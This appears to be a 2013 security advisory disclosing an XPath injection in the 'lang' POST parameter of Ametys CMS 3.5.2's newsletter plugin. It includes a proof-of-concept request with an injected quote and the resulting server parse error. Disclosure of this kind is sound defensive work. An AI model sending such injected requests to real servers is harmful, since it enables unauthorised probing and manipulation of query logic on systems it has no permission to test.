The Enigma Group

Ametys CMS 3.5.2 - (lang parameter) XPath Injection Vulnerability


Ametys CMS 3.5.2 (lang parameter) XPath Injection Vulnerability





Vendor: Anyware Services

Product web page: http://www.ametys.org

Download: http://www.ametys.org/en/download/ametys-cms.html

Affected version: 3.5.2 and 3.5.1



Summary: Ametys is a Java-based open source CMS combining

rich content with an easy-to-use and intuitive interface.



Desc: Input passed via the 'lang' POST parameter in the

newsletter plugin is not properly sanitised before being

used to construct a XPath query for XML data. This can be

exploited to manipulate XPath queries by injecting arbitrary

XPath code.



Tested on: Microsoft Windows 7 Ultimate (EN) 32bit

           Jetty 6.1.21





Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

                            @zeroscience





Advisory ID: ZSL-2013-5162

Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5162.php





24.11.2013



--







Request:

--------



POST /cms/plugins/newsletter/category/nodes HTTP/1.1

Host: 192.168.8.11:8080

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/25.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://192.168.8.11:8080/cms/event/index.html

Content-Length: 137

Cookie: ametys.accept.non.supported.navigators=on; JSESSIONID=1na81i031qhdw; __utma=111872281.3880910164568079000.1385252858.1385252858.1385252858.1; __utmb=111872281.1.10.1385252858; __utmc=111872281; __utmz=111872281.1385252858.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Connection: keep-alive

Pragma: no-cache

Cache-Control: no-cache



sitename=event&categoriesOnly=&debug=%255Bobject%2520Object%255D&userLocale=en&siteName=event&skin=demo&categoryID=root&lang=en'&node=root





Response:

---------



HTTP/1.1 500 Internal Server Error

Date: Sun, 24 Nov 2013 00:55:08 GMT

Content-Type: text/html; charset=utf-8

Server: Jetty(6.1.21)

Content-Length: 27280



...

...

org.apache.jackrabbit.spi.commons.query.xpath.ParseException:



                    Encountered "\'//element(*, ametys:page)[@ametys-internal:tags =\'" at line 1, column 68.

                    Was expecting one of:

                    "or" ...

                    "and" ...

                    "div" ...

                    "idiv" ...

                    "mod" ...

                    "*" ...

                    "return" ...

                    "to" ...

                    "where" ...

                    "intersect" ...

                    "union" ...

                    "except" ...

                    <Instanceof> ...

                    <Castable> ...

                    "/" ...

                    "//" ...

                    "=" ...

                    "is" ...

...

...